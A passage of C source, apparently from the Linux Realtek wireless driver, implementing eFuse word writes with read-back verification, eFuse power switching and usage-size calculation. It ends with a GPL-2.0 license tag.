u8 badworden = 0x0F;
u8 tmpdata[8];
memset(tmpdata, 0xff, PGPKT_DATA_SIZE);
RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD, "word_en = %x efuse_addr=%x\n",
word_en, efuse_addr);
if (!(word_en & BIT(0))) {
tmpaddr = start_addr;
efuse_one_byte_write(hw, start_addr++, data[0]);
efuse_one_byte_write(hw, start_addr++, data[1]);
efuse_one_byte_read(hw, tmpaddr, &tmpdata[0]);
efuse_one_byte_read(hw, tmpaddr + 1, &tmpdata[1]);
if ((data[0] != tmpdata[0]) || (data[1] != tmpdata[1]))
badworden &= (~BIT(0));
}
if (!(word_en & BIT(1))) {
tmpaddr = start_addr;
efuse_one_byte_write(hw, start_addr++, data[2]);
efuse_one_byte_write(hw, start_addr++, data[3]);
efuse_one_byte_read(hw, tmpaddr, &tmpdata[2]);
efuse_one_byte_read(hw, tmpaddr + 1, &tmpdata[3]);
if ((data[2] != tmpdata[2]) || (data[3] != tmpdata[3]))
badworden &= (~BIT(1));
}
if (!(word_en & BIT(2))) {
tmpaddr = start_addr;
efuse_one_byte_write(hw, start_addr++, data[4]);
efuse_one_byte_write(hw, start_addr++, data[5]);
efuse_one_byte_read(hw, tmpaddr, &tmpdata[4]);
efuse_one_byte_read(hw, tmpaddr + 1, &tmpdata[5]);
if ((data[4] != tmpdata[4]) || (data[5] != tmpdata[5]))
badworden &= (~BIT(2));
}
if (!(word_en & BIT(3))) {
tmpaddr = start_addr;
efuse_one_byte_write(hw, start_addr++, data[6]);
efuse_one_byte_write(hw, start_addr++, data[7]);
efuse_one_byte_read(hw, tmpaddr, &tmpdata[6]);
efuse_one_byte_read(hw, tmpaddr + 1, &tmpdata[7]);
if ((data[6] != tmpdata[6]) || (data[7] != tmpdata[7]))
badworden &= (~BIT(3));
}
return badworden;
}
static void efuse_power_switch(struct ieee80211_hw *hw, u8 write, u8 pwrstate)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtl_priv(hw));
u8 tempval;
u16 tmpV16;
if (pwrstate && (rtlhal->hw_type !=
HARDWARE_TYPE_RTL8192SE)) {
tmpV16 = rtl_read_word(rtlpriv,
rtlpriv->cfg->maps[SYS_ISO_CTRL]);
if (!(tmpV16 & rtlpriv->cfg->maps[EFUSE_PWC_EV12V])) {
tmpV16 |= rtlpriv->cfg->maps[EFUSE_PWC_EV12V];
rtl_write_word(rtlpriv,
rtlpriv->cfg->maps[SYS_ISO_CTRL],
tmpV16);
}
tmpV16 = rtl_read_word(rtlpriv,
rtlpriv->cfg->maps[SYS_FUNC_EN]);
if (!(tmpV16 & rtlpriv->cfg->maps[EFUSE_FEN_ELDR])) {
tmpV16 |= rtlpriv->cfg->maps[EFUSE_FEN_ELDR];
rtl_write_word(rtlpriv,
rtlpriv->cfg->maps[SYS_FUNC_EN], tmpV16);
}
tmpV16 = rtl_read_word(rtlpriv, rtlpriv->cfg->maps[SYS_CLK]);
if ((!(tmpV16 & rtlpriv->cfg->maps[EFUSE_LOADER_CLK_EN])) ||
(!(tmpV16 & rtlpriv->cfg->maps[EFUSE_ANA8M]))) {
tmpV16 |= (rtlpriv->cfg->maps[EFUSE_LOADER_CLK_EN] |
rtlpriv->cfg->maps[EFUSE_ANA8M]);
rtl_write_word(rtlpriv,
rtlpriv->cfg->maps[SYS_CLK], tmpV16);
}
}
if (pwrstate) {
if (write) {
tempval = rtl_read_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_TEST] +
3);
if (rtlhal->hw_type != HARDWARE_TYPE_RTL8192SE) {
tempval &= 0x0F;
tempval |= (VOLTAGE_V25 << 4);
}
rtl_write_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_TEST] + 3,
(tempval | 0x80));
}
if (rtlhal->hw_type == HARDWARE_TYPE_RTL8192SE) {
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CLK],
0x03);
}
} else {
if (write) {
tempval = rtl_read_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_TEST] +
3);
rtl_write_byte(rtlpriv,
rtlpriv->cfg->maps[EFUSE_TEST] + 3,
(tempval & 0x7F));
}
if (rtlhal->hw_type == HARDWARE_TYPE_RTL8192SE) {
rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CLK],
0x02);
}
}
}
static u16 efuse_get_current_size(struct ieee80211_hw *hw)
{
int continual = true;
u16 efuse_addr = 0;
u8 hworden;
u8 efuse_data, word_cnts;
while (continual && efuse_one_byte_read(hw, efuse_addr, &efuse_data)
&& (efuse_addr < EFUSE_MAX_SIZE)) {
if (efuse_data != 0xFF) {
hworden = efuse_data & 0x0F;
word_cnts = efuse_calculate_word_cnts(hworden);
efuse_addr = efuse_addr + (word_cnts * 2) + 1;
} else {
continual = false;
}
}
return efuse_addr;
}
static u8 efuse_calculate_word_cnts(u8 word_en)
{
u8 word_cnts = 0;
if (!(word_en & BIT(0)))
word_cnts++;
if (!(word_en & BIT(1)))
word_cnts++;
if (!(word_en & BIT(2)))
word_cnts++;
if (!(word_en & BIT(3)))
word_cnts++;
return word_cnts;
}
| gpl-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.